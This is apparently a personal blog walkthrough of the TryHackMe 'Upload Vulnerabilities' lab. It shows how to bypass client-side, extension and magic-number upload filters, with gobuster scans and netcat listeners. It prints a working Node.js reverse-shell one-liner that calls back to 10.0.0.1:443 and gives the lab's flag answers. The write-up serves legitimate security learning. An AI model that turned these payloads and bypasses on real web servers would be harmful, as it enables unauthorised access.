TryHackMe – Upload Vulnerabilities

The following write up is posted here to show how I worked through this on the TryHackMe platform to learn how to gain access to a webserver.

Task 1 – Getting Started

Start the VM and make the changes to your hosts file outlined in task 1.

cd ..
cd etc
sudo nano hosts

Copy and paste the information from task 1.

Ctrl-X to exit nano, when prompted hit Y to save then Return to save the file has hosts.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 2 Introduction

Read the introduction.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 3: General Methodology

Read the information here and proceed.

Q1: No Answer Needed.

A1: No Answer Needed.

Task 4: Overwriting Existing Files

Q1: What is the name of the image file which can be overwritten?

Right click and view code or inspect. In the body there is only one file:

A1: mountains.jpg

Q2: Overwrite the image. What is the flag you receive?

Download any image from the internet and save it as “mountains.jpg”. Then upload this to the site using the buttons on the site.

A1: THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5}

Task 5: Remote Code Execution

Q1: Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?

Run gobuster:

gobuster dir -u http://shell.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

When I ran this on the attackbox it took a long time.

A1: /resources

Q2: Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?

This one was a little harder. I had to restart the VM because it wasn’t allowing me to upload anymore.

Copy the webshell that is included in KALI:

cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php

Change the IP listed there to your attackbox ip. Save and Exit.

Now upload that to: http://shell.uploadvulns.thm/

Before doing anything else start a netcat listener.

nc -nlvp 1234

Now go to the resources page: http://shell.uploadvulns.thm/resources

Verify your shell.php is there. Click it.

Now you should have access to the machine in the console you have netcat running in. Type the below in that console:

cd /var/www
ls
cat flag.txt

A1: THM{YWFhY2U3ZGI4N2QxNmQzZjk0YjgzZDZk}

Task 6: Filtering

Read the content of task 6.

Q1: What is the traditionally predominant server-side scripting language?

Hint we used it in the last task:

A1: php

Q2: When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

Answer is in the reading of task 6.

A2: whitelist

Q3: [Research] What MIME type would you expect to see when uploading a CSV file?

Google it.

A3: text/csv

Task 7: Bypassing Client-Side Filtering

Ok we need to use burp suite to do this one. We need to bypass the javascript that stops us from uploading php files.

We are going to run gobuster again on this new site to see where the uploaded files go.

gobuster -u http://java.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Mine was still running but I saw what I wanted already “images”.

Launch burpsuite and turn it on in the browser:

Go to  http://java.uploadvulns.thm/

You should see the following in burpsuite, Right-click to Do intercept and delete the javascript.

Press forward.

Now go back to the site and upload the shell file.

turn on netacat

nc -nlvp 1234

Go to http://java.uploadvulns.thm/images

and click on the shell file.

Check your netcat console and you should see you’re in!

Q1: What is the flag in /var/www/?

To capture the flag use:

cat /var/www/flag.txt

A1: THM{NDllZDQxNjJjOTE0YWNhZGY3YjljNmE2}

Task 8: Bypassing Server-Side Filtering: File Extensions

This was very frustrating. I kept running into an issue with the VM:

When trying to upload I kept running into an issue, I would get the message: File must be chosen before being uploaded. Type “help” for syntax. To fix or resolve this issue I had to restart the VM and change my host file again.

Back to the task at hand. In order to get the file uploaded you have to change the file extension. Acceptable file extensions for php files also includes .php5. So I changed the file to rshell.php5. Just in case “shell” sets anything off.

This works. You can run gobuster to find the directories. 

gobuster -u http://annex.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here we find privacy.

After finally getting the file uploaded, I can find it in http://magic.uploadvulns.thm/privacy

start netcat as usual:

nc – nlvp 1234

You should have access now.

Q1: What is the flag in /var/www/?

Find the flag:

cat /var/www/flag.txt

A1: THM{MGEyYzJiYmI3ODIyM2FlNTNkNjZjYjFl}

Task 9: Bypassing Server-Side Filtering: Magic Numbers

Another gobuster to start:

gobuster -u http://magic.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Looks like graphics will be our directory this time.

We are going to make a copy of shell and call it magic.php

cp shell.php magic.php

Now we need to change magic.php so the file thinks it is a GIF.

Nano magic to add AAAAAA  at the top. Save.

Install hexeditor

apt install ncurses-hexedit

Run it on magic.php

hexeditor magic.php

Change the first few values to those you can find here for GIF.

47 49 46 38 37 61

Upload the file. Start netcat.

nc -nlvp 1234

The directory is forbidden so we have to type the URL directly in.

http://magic.uploadvulns.thm/graphics/magic.php

Q1: Grab the flag from /var/www/

You should be in. Cat the flag.

cat /var/www/flag.txt

A1: THM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}

Task 10: Example Methodology

Read the information in the task.

Q1: No Answer needed.

A1: No Answer needed.

Task 11: Challenge

Run gobusters first

gobuster -u http://jewel.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It’s probably going to be content.

This server changes the name of the files once they are uploaded so we need to see what is there first, using another gobuster

gobuster -u http://jewel.uploadvulns.thm/content/ dir -x jpg --wordlist ~/Downloads/vuln.txt

The vuln.txt here is from the task files you downloaded. This shows us what is in the content folder before we upload, so any new file will be the file we added.

Create a new file:

nano shell.jpg

and paste this code in:

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(443, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();

Now we need to run burpsuite and stop when we see the upload.js run. Like before we will need to right click “Do intercept” then Response to this request. Then forward until we get the javascript. Take out the three sections of code that check the File Size, Magic Number, and File Extension.

After the file is uploaded we are going to run the same gobuster command to see what are the new jpgs.

I now see a new file DHR.jpg (you’re jpg filenname will be different).

Now we need to start netcat.

nc -nlvp 443

We also know from the very first gobuster that there is an Admin folder, so we can use that page to run our shell.

http://jewel.uploadvulns.thm/admin

Here we type in

../content/DHR.jpg

netcat should pick up the connection. Then, same as before run:

cat /var/www/flag.txt

Q1: Hack the machine and grab the flag from /var/www/

A1: THM{NzRlYTUwNTIzODMwMWZhMzBiY2JlZWU2}

Task 12: Conclusion

Q1: No answer needed.

A1: No answer needed.

That one was hard. If you run into issues, try terminating the VM and restarting (remember to change your hosts file).

Also here are some good resources:

One thought on “TryHackMe – Upload Vulnerabilities”

  1. Pingback: Weekly Cybersecurity Wrap-up 3/25/24 - Jason’s Feed

Comments are closed.